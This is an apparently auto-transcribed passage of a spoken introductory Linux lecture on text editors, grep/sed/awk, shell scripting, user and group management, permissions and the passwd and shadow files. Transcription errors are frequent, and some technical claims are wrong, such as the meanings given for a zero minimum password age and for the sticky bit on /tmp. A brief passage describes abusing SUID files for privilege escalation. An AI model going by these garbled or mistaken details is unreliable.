it onto my display I can just do Nano and just open it and scroll through it as I wish and then once I’m done I can if I want to save any changes that I I’ve made you do control o we’re again we’re going to go through all of this stuff so this these are just overviews you do control o to save it and then control X to exit um contrl K could be cut the line contrl W would be to locate something so it be where is something and you can look for certain text there’s a lot of options that comes with it those are just some of the common ones but Nano is the text editor and Vim is the other one that I mean it says it has a steep learning curve but in my opinion it doesn’t um it can be uh open just to read something it can be open to insert something it can be uh Visual and it can go in Fairly dep uh deep uh options that it has and uh there’s a lot of help uh manuals for all of these things as well so uh you’re not going to be left to the Wolves as so to speak just to kind of go through this stuff and uh I would be to enter insert mode so it would be vim and then I to go into insert mode um once you’re inside of vim and you’re done with everything you can do colon W to write or to save colon Q to quit colon WQ to save and quit Etc um and you can search for an any given pattern uh to delete a line you would do DD these are just common options this is not uh anything that you’re supposed to memorize right now because again we’re just going to go through the interactions but these are the text editors that you should be aware of so that once we go into it we don’t have to just do an overview of hey this is a text editor and this is what it does so on and so forth when we go to the Practical section we’re just going to start using these tools and it’ll be it’ll just kind of uh reinforce all of the data that we’re covering right now all right now we’re going to go into another level of dealing with files um and manipulating them and searching through them so grep is another one of these tools that you’re going to use very very frequently because it’s very powerful and it searches for stuff so uh it stands for Global regular expression print so you don’t have to know that you just know that grep search just for things um you can search for text within files so typically it’s like you’re searching for uh any given pattern or a word or you can even do actual regular expressions and then you give it the location that you wanted to search within so if you wanted to be case insensitive you would do- I so that it can just look for whatever without having to worry about capital letters or lowercase letters if you do R it’ll be a recursive search inside of a directory so if you do uh if instead of having a right here if you give it to something to search for inside of a directory it can actually do that and it can search for whatever that is um V would be to invert the mat so it shows uh lines that don’t match the pattern so if you want to show something let’s say that there’s a lot of noise and it all has to do with a certain event ID so if you want to show everything other than that event ID you would do V and it would show everything that doesn’t match that event ID so will show everything other than that event ID so grip is a very useful tool and typically you can also do a combination of commands where you pipe the output of another command into GP so that it’ll search for you so for example you can do cat and then concatenate something and then use grep to search through the data of that file typic that’s kind of just a very very simple example but you can do that a lot um sort will arrange the contents in a specific order so you can actually combine grip with sort so you can grip for something and if you know there’s going to be a lot of data you can then sort that data to be output onto the screen into a any given order so for example uh to sort alphabetically from A to Z you just do sort by itself if you want to reverse the order so do Z to A you could do sort dasr and then uh the file name or the contents of grep right so you can just do grep Etc and then sort d r and it’ll show everything Z to A if you do sort by itself it’ll just do uh A to Z or ascending order we can call it ascending order and then you can have descending order as well you can also sort files numerically using the N flag so that could be potentially if you’re sorting files specifically that could be potentially what you can do uh you can uh sort output numerically as well uh and then you can reverse the order of that using the- R so it’s very flexible there’s a lot of different ways that you can do uh interact with it um you can then use cut to take certain pieces of data so certain columns let’s say from that given file so you do GP it searches for the data it and you want to take instead of getting every line that comes out of that uh result you want just the First Column or the first two columns so you would do that and then you provide whatever the options are and then you cut that data from the results for yourself so there’s something called said that that is the stream editor so data streams are just another way to look at um text that is inside of a file and sometimes uh when you’re looking at certain types of text uh it may not be plain text it may be formatted in any type of uh display or format so it may not necessarily just be plain text the way that you’re seeing inside of the screen it could be Bas 64 formatting or encoding that should that’s probably the better word so it could be encoded in some way and you want to just display C certain things that you know that will might necessarily match into something um so what you can do is you can uh edit it for the output right so set stream editor uh will take the first instance of old so let’s say it finds something that is called Old for example and then it’ll replace it with new so the the first one is the actual data that it’s found and then the next one is what it’s going to be replaced with and then it’s going to do that for every line that it actually finds this specific pattern in so if it finds old inside of every whatever line it finds it’ll replace it with new for that line if you want to edit it if you want to actually transform that inside of whatever the file is you can actually do that using the if flag so it’ll take the it’ll still find the thing that you want it to find but it’ll do an in place editing it’ll actually edit the contents of it within the file for you um you may not necessarily want to do that maybe you just want to search for it and display the results so that one should be used uh cautiously but uh this is what the stream editor does for us if we want to extract data so the these are things that actually have Fields so typically like a a CSV file for example or something that has a field that has a value uh inside of it uh this is the type of data that you would use a for awk um and the usage is to take essentially the First Column so this is what this is right here so it would print the First Column right here of this file which is what I mean when I say field-based and usually CSV files are like that CSV files are separated by commas which turn into a spreadsheet for example so when you use something that has those types of fields you can extract the data of that uh and in this particular case it’s going to take the very first column and then print all of the data that’s in inside of that First Column from file.txt um if you have a condition that you want it to print for you so if the the third column is greater than 50 for example you wanted to print everything from one to three right so or not from one to three it would be columns one and three so column one for example would be the name of the field or the name of that specific line item and then column three would be the value that so associated with that col line item so if the value inside of column 3 is greater than 50 I want you to print the name of that thing and then whatever the value is and that’s what that does for you so you can actually give it conditional examples and this is almost like writing a script actually it is basically a script it’s like a conditional statement right so if the value of column 3 is greater than 50 I want you to print that data onto my screen and this is the perfect segue to get into shells scripting so setting up a simple shell script uh we’ve kind of already talked about this so I’m not going to spend too much time over here so first and foremost you want to create the script so you can do touch script.sh that would be a basic command to create your script and then add a shebang line which we’ve already talked about at the very very top so the very first line of that script.sh file is going to be uh the shebang line which is this piece right here so we just call shebang right so that’s the shebang line and you have to put that at the top of every single script in order for the script to actually run as a script otherwise it’s just going to be a file with a bunch of lines of supposed code but there is no interpreter this is what The Interpreter would be there is no interpreter so that it won’t be executed as a script now once you have that file and you have your code and everything in it you need to make it executable and that’s done through the changing of the permissions so chod which we’re going to visit later when we get into permissions stands for change mode and then when you do plus anything you’re adding that permission to it so in this case we’re adding X which is the executable permission and we’re adding it to script.sh so change mode add executable permission to the script and that’s the general outline of how that uh permission change does now if you want to remove executable permission you would do minus X and then it removes executable permission from whatever that file is and that’s that’s basically how permission adding and removal works so fairly simple now once you have it so let’s say you want to create a bunch of variables inside of your script the first variable in this particular case would be the name equals Linux GPT and then when you want to refer to this variable so that would be the the variable name it equals so this is called an assigning operator where assign assigning this value to it if you use two equal signs it’s a comparative operator and we’ll talk about that in a little bit but typically when you not typically every single time when you use a singular equal sign you’re assigning a value of something to this specific variable so in this case we’re assigning this string Linux GPT is now assigned to this variable which is name then you refer to this variable with dollar sign name so if I ever use Echo dollar sign name it’ll print Linux GPT onto the screen or inside of whatever it needs to do because we have now assigned this string to this value very simple um you can also substitute the variable by assigning an actual command to it now in order to do that you would need to do dollar sign and then put the command inside of parenthesis but the way that this works is that if I just typed date onto my terminal it’ll give me the date and time that we’re in right now but I want to store that value of this command inside of this variable so I can do date equals and then I do a dollar sign and put that command inside of the uh the parentheses and now I’ve assigned the value of this command to this specific variable you could do name equals uname for example and it’ll give us all of the data that is assigned to that machine and it stores all all of that data inside of this variable that we have over here so you can assign text or strings uh to the variable or you can assign the contents of another command to the variable it’s called assigning variables both of them are technically an assignment because you’re using a singular equal sign and then you’re just choosing the type of value that you want to assign to that variable once you have your variable you can then create your conditional statement if you want to use a conditional statement so a conditional statement is it’s very basic right so if something do something else don’t do something or do something else and then you have to add fee at the end well I consider it to be finish just like short for finish but I think it’s just a backward version of if and that’s how the scripting in Shell Works in uh in Shell the shell language um I don’t know if it’s a language actually I think it’s a language but whatever um when we’re looking at this specific uh the conditional statement right here we can see that if and then inside of our brackets we have our first condition so we say if the variable whatever that variable is equals value so now look we’re looking at a double equal sign so now it’s comparative right before when you use the singular uh single equal sign you were assigning the value but now you’re comparing so you’re saying if the value of this variable equals to the value that we’re looking for and then you do a semicolon you say then I want you to print onto the screen the condition has been met notice that there’s an indentation here typically there’s at least either two spaces or four spaces uh for user friendliness or reader friendliness I recommend you always use four spaces um so if the variable equals the value that we’re looking for then I want you to print onto the screen that the condition has has been met if it hasn’t been met that’s what else means else just prints that the condition has not been met that’s it and then finish and that’s the full basic structure if any of these things are missing so for example if the semicolon is missing this is not going to work this entire conditional statement is not going to work if this fee at the end the FI at the end is missing this is not going to work and usually you’ll get some kind of a notification that there is a error online such and such and something is missing or the syntax is wrong so on and so forth so you’ll be able to debug your code accordingly but it’s very important that you understand that everything in this piece of in this block of code has to be here if this parenthe not parenthesis if this quotation mark at the end is missing you’re going to get an error if uh this specific equal sign is missing then it’s going to say well this is also a logic error because you’re trying to assign a variable to this value when it already has been assigned something else and now you’re trying to reassign it like that doesn’t make sense so there every piece of this needs to actually work here if this dollar sign is missing it’s not going to work so a lot of these things you you got to be very specific with scripting is very specific once all the details are there it’s going to work like a charm but if the details are not there you’re going to have a lot of issues so this is just a basic structure of a conditional statement and these are some of the comparative operators the comparison operators that we’re looking at so right here we’re looking at equals to the value but right here you could say okay if it’s less than the value that we want or greater than the value that we want uh or if it’s less than or equal to so L would be less than or equal to or greater than or equal to the value that we want or equal to the value that we want or not equal to value that we want all of these operators that you’re looking at right here have to do with num numbers okay so if you’re going to use any of these things you’re using integers or you’re using numbers as the value operation or the value comparison excuse me the ones down here have to do with strings so a double equal sign is comparing the value of a string so if you can see right here we actually have a string as our value so we’re using a double equal sign so if we say if this equals I want you to do da in this case W equal equals uh equal a double equal means that you are looking for the actual uh comparison to be made so if this does equal to this uh if you do a exclamation equal means that it does not equal to that there’s too many equals that I’m talking about I’m almost I’m losing myself in this explanation but I think you get what I mean so if you have two equal signs that means it does equal to whatever the value is if you have an exclamation equal sign it means it does not equal to what whatever the value is and then this is where a lot of automation stuff comes in so this is actually really this is like it’s very basic what we’re looking at on the screen right now but this is the foundation of automating tasks so for something in a list I want you to do something right so in this case it would say for item in 1 two 3 I want you to Echo that item so what it would do in this case is it would print one two and 3 1 2 3 so per line it would say this value this value and this value and it would print that onto our screen for us right so for item and this could essentially be anything so it could be for I in one two3 do Echo dollar sign I so this name is another one of those variables that has been assigned in this particular Loop it doesn’t necessarily have to be exactly this in a lot of cases is it could just be a single letter or it could be any word really it could be for value in one two 3 Echo value right so for the whatever this is for this inside of this list and this could be a variable that has that stores a massive list in inside of it in this particular case we don’t have a massive list stored we just have the simple list you would do your semicolon because you have to separate this piece and then you say for this condition I want you to do this action right here and then when you’re done that’s it you’re done so this has to be here in order for this block of code to be complete it’s kind of similar to what we do in Python except in Python we don’t have done and we don’t say do or something like that we just say for what whatever I don’t want to I don’t want to confuse you but this is a for Loop and this can iterate over a list the list could be a completely separate variable that houses a bunch of data or it could be a variable that is reading from a separate file and then you’re going through the contents of that file there’s a lot of stuff that you can do with for Loops this is a very very simple for Loop but for Loops are the essence of Automation and this is one of the most powerful things that you will learn when we actually get into scripting and creating some Advanced scripting this is one of the most powerful things that you’re going to learn is creating complex for loops and inside of a for Loop you can have an IFL state statement inside of a for Loop you can have another for Loop and there’s a lot of different great things about it and as long as you have your indentation correctly then everything should run smoothly so keep in mind that the indentation is very important in order for a for Loop to work you have the header which is this piece right here and then you have the body which is this piece right here and the same thing applies to our IFL statement this is our header of the if statement then you have the body of the if statement then you have the else which is another header and then you have the body of the else portion and then you have the finish at the very end so the indentation is very important to keep that in mind especially as we go into the the writing of the scripting you’ll notice how those things work and then so there’s a for Loop and then there’s a while loop now a while loop runs as long as the condition itself is true so while loop has a condition that it needs to be met so for examp example we have counter equals 1 that’s our variable okay so the counter equals 1 now we’re saying while the variable counter is less than or equal to 5 then I want you to Echo counter and then counter in this particular case inside of the while loop so remember there’s this ination so inside of the while loop now we have a new counter variable but what we’re doing now is we’re assigning that previous variable + one so for every time that this iterates what it’s going to do is it’s going to print the first time that it iterates it’s going to print one onto the screen then for the next line it’s going to iterate again or actually excuse me it’s going to print one onto the screen and then it’s going to add one to this variable which would then equal two right so then it’s going to Loop through this again and it’s going to say okay it’s still less than or equal to five so I’m going to Echo that onto the screen but now the value is two so then it’s going to add one to that new value which will make it three and then it’s going to go okay yes it is still less than or equal to five and then it’s going to print that onto the screen and then it’s going to keep going until it hits five so once this condition at the top right here is now saying oh it is equal to five now so if it is equal to five then you’re done right so that’s it because that at that point the condition is no longer true the condition becomes false right because once that’s done once it’s equal to five it’s going to go over here and then it’s going to add one to it so it’ll become six and then when it goes up here and it says hey is this equal to five it’s like no no no it’s not less than or equal to five now it’s six so I’m done I don’t I I’m not going to do this anymore so this is a while loop so it’ll keep running as long as the condition itself is true and in this case our condition is if this variable is less than or equal to 5 then just print it onto the screen once you’ve done printing it then I want you to add one to that value right here and then on the second iteration and then the third and then the fourth and then after that it should be at five and that’s it that’s when it’s done because the fifth iteration it’ll actually turn into six and then it’s done it’s no longer true so the condition has been met and the condition is now false and it can’t continue so that’s what while Loops are and that’s how while loops work all right now that you know how the system works and how the file system works and how to create files manipulate files and do all of that stuff with the actual system it is now time to move on to the users and the actual human beings that are going to be using the system and this is where a lot of the roles a lot of the responsibilities for uh being a system administrator actually comes in right because you have to deal more than just dealing with the system itself which is fairly simple to do especially once you understand how to find the guides and the manuals and so on and so forth now you have to learn how to deal with the people and manage the users and the groups that they are in so first and foremost creating users depending on the distribution that you’re on uh it’ll be one of these two commands so it’ll either be user add or add user and it requires pseudo permissions so uh basically administrator permissions or uh maybe root permissions even um it just you run the command and then you have the username at the end of it and that is basically it that’s literally how you add a new user now this is very simplistic typically there’s going to be multiple options that you would run along with your user ad command just to kind of handle certain things alog together um but you can also run them after the fact so you can just do pseudo username ad or user ad and then the actual name of the person and then first you would set up a password for them and I’ll show you specifically what that is um and that also requires pseudo permissions as well um then you would need to assign a home directory to them uh the default home directory if you just do user ad-h uh M if you just have the- m flag and then you do username what it’ll do is that if the person’s name is Alice it’ll add their home directory to home Alice which is typical of uh where the home directories of all the users are based on what we’ve already learned about the file system now if you want to declare a specific directory for that username then what you would do is you would add- M and then you would do- D and then you would have to declare where you want that uh usernames home directory to be and in this case it’ll be data users Alice and that’ll be the directory of their home and then from there this would be the username itself that we’re going to add so you’re adding a user and then you’re declaring where you want their home directory to be by assigning these two flags as well as the path and then this is the name of the user that’s being added um you can specify the login shell for that user so again you’re adding a new user and then you do-s and then you say that this is their login shell which is the typical login shell location for the binaries and then that would be the username itself that’s being added and then supplementary groups and we’re going to deal with group management in a little bit as well and we’re going to do all of these things by the way when we get to the practical portion I feel like I just have to keep saying that cuz this is just more of an overview and I know I’m glossing over a lot of these things but it’s mainly because the fact that we’re going to do a lot of the Practical exercises so um pseudo user ad and then you have a capital G right here and the developers would be one group and then admins would be another group and then Alice gets added to those supplementary groups so these are just some basic commands to add user details now this is a full command that you’re looking at over here right so we’re going to do Pudo user ad and then we’re going to assign a directory for this person which is going to be this place this is their home directory we’re going to assign their uh shell which is going to be at this specific location we’re going to add them to a supplementary Group which is going to be developers and admins and then we’re going to add a comment so Dash C right here is just a basic comment for this particular user who’s going to be Alex Johnson developer and then the final piece right here is the actual username itself so M creates the home directory D sets the custom home directory – s would be their uh zh uh zsh at the login shell D capital G developers and admins adds them to developers and admins and then- C is just a comment uh at the very end just to say that this is who it is and this is mostly for the system administrator that’s going to be looking at this and then finally Alice the actual username of the person and this one long command but it does a lot of things when you’re creating that user and then if you wanted to uh add their password right so typically what you do is you assign a password once you create somebody and then you have to immediately expire the password so that the next time that they log in which would be the first time they officially log in they get notification that your password has expired and you need to set up a new password so you create the user you set up a password by doing pseudo pass WD and then the username and then there’s going to be certain prompts that are going to come in so they’re going to be like yeah what do you want their password to be and then uh confirm the password and then you do this specific piece right here to expire the password that you just assigned to that person and then from there the next time that they log in they’re going to be prompted to actually set up a new password themselves so this is the the very gist the very basic gist of creating a new user now some of our basic commands for managing user so if you want to modify an existing user details with user mod that’s typically how it would work so if you wanted to change their username for example you would do DL this would be the new username and then this is the old username that’s being changed if you wanted to lock an account or unlock an account it would be with the capital L and it would lock that account and then capital u to unlock that account and there’s a variety of user modification commands that we’ll be working with once we get to the Practical section and then there’s also the user delete portion and uh the dasr right here would be a cleanup of everything so deleting the user and you’re also removing their home directory and all of the contents of that user and their directory so uh these are just basic uh user management so to speak commands that you’re going to be implementing when we get to the Practical section and then we have creating and managing groups creating and managing groups is as simple as using the group AD command and then just specifying the group name you can also uh add a user to a group using the um AG so a stands for append and then G stands for the group itself and then you can just add them to a single group or multiple group so this would be outside of the user ad uh version of adding somebody to a group so when you do user mod you would need to do the lowercase a uppercase G to be able to add them to whatever the group is and this would be a supplementary group that you’re adding them too and then of course you can just do group Dell to delete somebody or to excuse me to delete the group that you have specified so the group name that would be what you would be deleting in this particular case um understanding difference between primary and supplementary groups is very important so a primary group is the main group that’s associated for that user um when they create a file and if they create any kind of file or folder the group ownership permission of that file is set to whatever the user’s primary group is now by default every time you create a user there’s going to be a new group that’s created by their name so if it’s Alice as the user there’s going to be a new group named Alice that’s going to be created inside of your group’s directory and that’s going to be the primary group that’s been assigned to that person so when you want to change their primary group you would use the user mod command and then you would do a lowercase G and then the name of the group itself so whatever it could be one of your existing groups it doesn’t have to be a new group that you’ve created but you’re changing the primary group of that person by doing a lowercase G flag and then assigning the group name and then the username themselves and then now you’ve changed their primary group a supplementary group is additional groups that they have access to so you know based on who they are and what permissions they have or what roles they have they could have multiple groups that they’re assigned to so they can get access to the resources that are available to all of those individual groups uh so that’s mainly the big piece that you want um and multi memberships can happen in a lot of cases in a lot of cases they do happen so for example just a a manager for example a manager will have access to the management group as well as the regular employee group for example so that they have access to all of the stuff that’s inside the manager folder as well as everything that’s inside of their own regular folder or along the other groups folder so there could be a manager they could be in marketing and they could have their own regular folder as well you know what I’m saying so they have multiple groups that they’re a part of it’s very useful for granting uh people access to different sets of files and directories owned by various groups you just have to be careful that whenever they leave that department so if they’re no longer in marketing they need to be removed from marketing unless they’ve gone up a level and they do still get access to the Marketing Group but if they’ve left Marketing in general completely and they went into Tech they shouldn’t get access to the stuff that’s inside of the marketing folder and this is mainly because that you want to protect the company from uh potential uh you know if the person Le Lees for example and there is a bunch of intellectual property that’s inside the marketing file or marketing folder and now they have access to all of the stuff inside of marketing and they can steal that IP for example that’s just an example so uh it could also protect the company from any security issues if that person gets hacked and they still had access to marketing for example and now they the hacker knows that they’re a part of that group and they go inside of the marketing folder and they see all of that IP and then they can steal that data because a system administrator didn’t remove them from that group and they should have never had access to that data to begin with so this is very important to keep in mind you can have multiple groups that somebody could be a member of you just need to be careful as you go along and as the company grows and as people’s roles change that you uh modify the groups that they’re members of because as long as they’re a member of that group they have access to everything that’s inside of that group um you can add or remove somebody from a supplementary Group by using the a G so lowercase a capital G and appending them to the specific group or groups that you want them to be added to so very similar to what we did previously uh by using user mod and then lowercase a capital G and then you start assigning the various groups that you want them to be added to and speaking of permissions and ownership and all that stuff access we are now in that particular section so file permissions overview um permissions model is a very fundamental component a very concept of managing access to files and directories uh it makes sure that only authorized users can read write or execute files or delete files or modify files so on and so forth maintaining the system security and integrity um there are permission models that are involved in three levels of access so there’s the owner of the file or folder or the asset or the whatever it may be there’s the group permission level and then there’s others so it’s basically everybody other than these people so it could be guests for example um so there is the owner of the file or folder there’s the group that they are assigned to which would be the primary group as we’ve already discussed their primary group is would be the group that it’s assigned to and then any everybody else that falls inside of others the owner is typically the user who created the file or the folder they have the highest level of control over their files and directories and they can set permissions to read write or execute the file or directory even if they are not a root user specifically so if example.txt is owned by the user Alice she can control who else can access and modify that file the group is associated with a specific group who are members of this group can be given certain permissions on the fileer directory so whatever the group permissions are the group permissions determine what groups uh what group members can do with that specific file or directory like the owner group members can have readwrite or execute permissions or whatever the permissions are that have been assigned to that specific group so if example text is associated with the group developers all the users and developers can be given permissions to read write or execute the file depending on the permissions available for that group specifically okay so keep that in mind because you can modify the permissions of the group and it may not necessarily be read write and execute all the files right and then you have others so it could be all the users who are neither owner nor members of that specific group so it could be everybody outside of Developers group or everybody who’s not the actual owner uh somebody that’s a guest for example so there’s a lot of different people that could be that could fall under the category of others so as long as they’re not the owner or they’re not inside of that primary group that’s been associated with that file then they all fall into the others category um determined uh the permissions for these people determine what any other user can do with the file it can also be set to read write or execute or it could be read or it could be uh execute or it could be none of the above right so they could have no permission to access it just depends on what the the company infrastructure is like so if example text has read permissions for others any user on the system that can actually read the file regardless of the user or group status so a very uh common file that is limited to a bunch of people that or all the people that falls into others would be the Etsy uh Shadow file the etsc shadow file has the password hashes of all of the users that is inside of that environment so even if somebody is not necessarily the root owner even if somebody is not necessarily inside of the administrator’s group and they’re in marketing for example that that means they fall in the others category and they should not be able to read that file so that’s very important to understand there are some files that even if people who are not guests and they’re actually senior Executives of the company or something there is a number of people a large number of people that should not have access to the Etsy Shadow file because it has all of the password hashes for every user that exists on that system so it’s very important to keep that in mind now the way that permissions are designed they go by read write and execute and they have acronyms for them so R would be for read W would be for write and then X would be to execute so read means you can view the contents of the file or the directory uh write means you can modify or delete the file or the directory and execute or X means that you can actually run the program or the script or access that specific directory so rwx so keep these in mind okay this is typically what it looks like and I would say that this is not typically what it looks like this is just this particular example but this is what it looks like when you look at the permissions of a given file or directory the first character which is represented by this Dash right here indicates the type of file that it is so if it’s a dash it would be a regular file if it’s a d that means it’s a directory okay so this is representing the very first character which is this Dash right here so in this case we’re looking at a file if this was a d then this would be a directory now the next three characters represent the owner’s permission so in this case RW and then we have a dash right here and if it was X that means it’s also executable right so this would be rwx representing the owner’s permission read write execute in this case the owner can read and WR write there is no execution so it’s probably not an executable file right it’s just read write and then that’s it and these are all of the permissions for the actual user that created the owner that created this particular file would be this this and this right here okay and then we have the next three characters that represent the group’s permissions in this particular case um in this example they’re saying r2x but in this case it’s just r d d so the group group can only read the contents of this particular file they can’t write to it and there’s no executable permission so there’s no execution that they can do on this particular file either and then the last three represent the others permissions which also in this case are read and then no writing or modifying and then no executing so this is what it looks like so the very very first one is either it’s a file or it’s a directory so a file or a folder so if it’s a regular hyphen a dash it means it’s a file if there was a d here that was mean that this was a directory the next three characters represent the owner’s permission the next three characters represent the group permission and then the last three characters represent every single other person and this is what the outline what the frame uh the template I should say the template of permissions are when you’re viewing the permissions of a file now let’s say you want to change the permissions of Any Given file or folder so we’ve already kind of touched on this so in this particular case we’re going to do CH mod so change mode and when you do plus X which is what we talked about in the very earlier example plus X adds executable permissions but what you’re doing in this case you’ve specified that you want a u which is the user so you want the user to have executable permissions to that file whatever the file name is right so CH mod changes the mode plus X which is a symbolic method of changing we can also talk about numeric methods which we’re going to do right now um but so we’re giving the user executable permissions to that file name which allows execute permission for that user now octal values would be a completely different thing so 755 so 7 represents the maximum permission so seven is read write and execute for the user five would be read and execute for the group as well as read and execute for everybody else so the value of these things breaks down if you had all of the permissions rewrite and execute you would have all permissions for that individual group so this is actually what the numeric value looks like to have read permissions you would be getting a value of four to have write permissions you’d get a value of two and to have execute permissions you would get a value of one so if there is read write and execute the value would be seven if you can only read the value would be four so if there was 744 that means the user could do read write and execute the group can only read and everybody else can only read right if it’s zero then that means they have no permissions okay so 740 means that the others group has no permission the user that created it the owner has rewrite an execute and then the group has uh just read permission right so that’s this is the the breakdown of what the values actually the numeric values of these things look like read equals to four write equals to two and execute equals to one and then when you have the breakdown like this over here then what that means is that the three numbers that are represented on the screen so CH mod 755 the seven is representing the owner the seven represents the owner the five represents the group and then the five right here represents everybody else so these three numbers represent uh the the modificate the uh overall owner group and others categories if it was 777 that means the owner the group and everybody else also has readwrite and execute permissions so just keep that in mind there’s the numeric value value of this the numeric method of modifying permissions and then there’s the symbolic method of modifying permissions along with changing uh permissions we can also talk about changing ownership and you can have ch own and and then CH grp which I’m sure you can imagine what these things mean so CH own stands for change ownership and chgrp CH stands for change group uh these are also pseudo commands so change ownership of the user to this particular group and then the file name as well so you’re changing the ownership of the user and the group for the file name so this is the example right here we have change group so change group of the group name to the file name that’s what we’re looking at so in the particular case that uh we have seen in the first line you’re changing the ownership of the the file name right here to this particular user and the group in this case we’re changing the group for this file name to whatever the group name is okay so just keep this in mind so these is how you change the ownership of the file name and it would be the user inside of this group and then you change the group of this file name by assigning it to this actual group grou so fair fairly simple it’s like fairly intuitive as far as the commands are concerned but you can and again just keep this in mind so once the file name has been assigned to this particular group that means now all of the permissions that are inside of this group are now applied to this file name and anybody who is inside of this group has all of those permissions on this particular file this is what’s very important to understand okay when you change the owner then you’re changing all of the permissions of this owner to this file name so if they have the permission and typically it’s everything they have all the permissions or whatever the main permissions are so you change all of the permissions of that owner to this file name if you’re changing the group of this file name everybody inside of this group has access to that file name and they have the permissions for that group over this file name so just keep this in mind it’s very important and then we have special permissions so suid sgid and the sticky bit so um when the Su ID when the set user ID when that permission is set that file will execute with the Privileges of the owner not the user that’s running it so this is very important to understand if the owner has administrator privileges and the set user ID the Su ID has been set on that file if the user so the user is not the owner right so whoever the user is when they run that file when they if it’s a script for example when they run that thing they’re running with the permissions of whoever the owner was that was created it it’s very simple and it’s it’s very uh powerful to understand okay you are setting the execution privileges of that file to be the execution privileges of the owner and not the user the user could be lower privilege the owner could be an admin and if the user is running it they are running it with the Privileges of the admin which is the owner so if you want to change an add that specific specific permission to the file you would do the change mode chod and then you add on the user level the S permission right here which is the suid and then you give the path to whatever the file or directory is so this is very much for things that are executable that everybody else should be able to uh access meaning a binary so a binary for example the password binary inside of the user bin so this is for the user binary not the the binary of the entire system so just keep that in mind so this is the users’s binary for their password allows regular users to change their password securely that’s what this specific binary allows them to do because we already established that the password binary allows somebody to change somebody’s password so if the user wants to be able to change their own password they should have the permission to be able to do that so this is what this does and this is the case that it would apply to and you just got to be you got to keep in mind that this is a security issue okay so if this is a system binary and this is again something that we’ve done a lot in pentesting we search for files by the permission that is set so if they have suid permission on that given binary or on that given folder we’re going to try to go ahead and access that folder and drop some kind of a exploit in there a payload in there so that we can run that payload Lo by the permissions of the administrator for example and so if we if that directory has admin privileges and we have a shell that we want to execute and we want to switch oursel to the admin privileges we can then run everything that’s inside that directory because it has the S permission set and then now we’re running it with the admin privilege which means we can execute as an admin and then give oursel access to that system as an administrator so this is very important to understand okay that may have been a little bit confusing that last piece may have been confusing but what you need to really understand is that suid will execute the Privileges of the owner not the user that’s running it so the user could have no permissions to do anything but the suid has been set on that file or folder and now they can run it as that owner right just keep that in mind SG ID is very similar except it applies to the group so it executes with the permissions of the files group and not necessarily the person that’s running it so for directories files that are created inside of that specific uh directory are going to run with the parent directories group so whoever the group is that owns that particular directory any file that’s dropped inside of that directory will run with the permissions of that specific group so if you want to change and add this specific feature for permission for any kind of a directory this would be it you would do G Plus s and that’s it and this is a CH mod that is done with pseudo by the way this is not something that typically would be done by everybody so a a lower level user should not be able to add the special permissions to these things uh this should only be something that’s allowed to be done by somebody who has administrator or root privileges so that we know that it’s the right person that’s making these changes so and everybody should not be able to make uh the special permission or modify the special permissions on files it should only be reserved for root administrators and domain administrators so on and so forth and then there’s something called the sticky bit so when you set a sticky bit on a directory only the file owner or directory owner can delete or modify the files within it regardless of the group or other right permissions or anything else right so only the owner of that file or directory can delete or modify it nobody else can do it this is called a sticky bit and so you do chod plus T you’re adding the sticky bit so just T you’re adding that to whatever the path of the directory or file is uh this is commonly used in shared directories like the temp folder so the the file owner or the directory owner can delete or modify the files within the temp folder regardless or of the group or other right permissions that may be assigned to that temp folder right so only the owner of the temp folder or the owner of the temp directory can delete or modify the files within that directory doesn’t matter who else is trying to do it uh doesn’t matter what other group or WR permissions exist only the owner can delete or modify the files within that directory so this is something else to keep in mind because this is also a security issue so if there’s a sticky bit that’s been assigned to something it’s also something to keep in mind and it’s typically something that you do uh to make more SEC like make the environment a little bit more secure so this is opposite of the the special permissions where it technically makes it less secure if something has the special permission attached to it any user can run it with the owner’s uh permissions or with the owner’s privileges whereas the scky bit only allows the owner of that file or directory to be able to modify meaning change or write to any of those files or delete any of the files inside of that directory which brings us finally to our user authentication and pseudo permissions portion so user authentication we’ve already touched on this particular file already so the Etsy password file stores all of the user names so the user accounts themselves there is no uh password doc uh hashes or any PL text or anything like that that’s inside of this file the name is kind of misleading and I think it’s been designed to be misleading each line in this file corresponds to a single user account and contains several Fields separated by colons and those fields all stand for something so all of the users the usern names are stored inside of the Etsy password file now this is an example of a uh a specific entry so you have Alice then there’s a colon and there’s an X and this is typically where the password hash would be and then you have colon and then an ID and another ID and then uh the name right here separated by a few commas and then another colon and then we have their home folder and then we have another colon and then we have their bash path so the username Alice would be the user’s login name so this is what their login name is the password placeholder which in this if we once we actually go into the shadow file and you’ll see this is a very large hash value that’s right here um the user ID would be this piece right here uh so unique numerical identifier for whatever their user ID is the group ID would be the primary group ID that’s associated for them which is in this case their actual personal group that was created when the user was created geckos um this is the optional user information like their full name office number Etc so this is this is the comment for example this is where the comment piece would fall which is everything that’s inside of this specific uh uh separated by these two com um what I’m having a brain fart the colons the inside of these two colons this is called the geckos which is the comments essentially so user information full name office number Etc and then we have their home directory which is the path to the users’s home directory and then we have their shell the default shell that’s been assigned for this user and this is what a typical entry inside of the Etsy password file looks like then there’s the Etsy Shadow file so the Etsy Shadow file has everything else that we just talked about except now it actually has the password hashes so the encrypted password information and other details related to the password management of that person this is more secure than Etsy password so a lot of people can actually access the Etsy password file because it doesn’t have the password hash in it the Etsy Shadow file cannot be accessed by anybody other than somebody who’s the root user or on the suit’s list so it’s very important in this particular case it’s saying it’s readable only by the root user which means that only the root user can access the Etsy Shadow file because it has the encrypted password hashes of all of the users now what we can see here is the same thing so we have Alice there’s the colon and then you see all of this data right here and all of this and you see there’s these this um this uh my gosh this ellipses that’s right here because this specific hash value was actually massive um it took multiple lines I think it took two lines so it was a very very large hash value but we can see that it’s been separated by these two colons right here so everything inside of this including the dollar sign and the six and the rounds and then including this forward slash at the very very end all of this was the hash value of Alice’s password and then there’s 18661 and then there’s 0 9999 7 and then the last three colons at the end so we have the user us name which is Alice the password hash which we already talked about uh this field contains the hash including details about the hashing algorithm and any salt that’s been used and typically the very uh beginning portion right here the dollar sign six and dollar sign this typically is the hashing algorithm and based on uh just what the breakdown is of the it could be shot 256 or whatever it is that’s typically what is determined at the very beginning right here and then the last password change so this is what 18661 looks like which the date of the last password change represented as the number of days since January 1st of 1970 so 1, 18661 uh 1,00 or excuse me 18,6 161 days gosh 18,6 61 days since January 1st of 1970 that this particular uh password was changed that’s been how many days it’s been changed so so you have to actually count forward from January 1st 1970 and come 18,6 61 days forward until you understand what date it was that the password was changed and then the minimum password age in this case is zero meaning the number of days required between password changes so this particular case there is no minimum age that’s required of this so uh it can essentially last as long as possible um and you can change this and this would be the number of days so if it’s 30 after 30 days it would have to be changed my bad excuse me so yeah 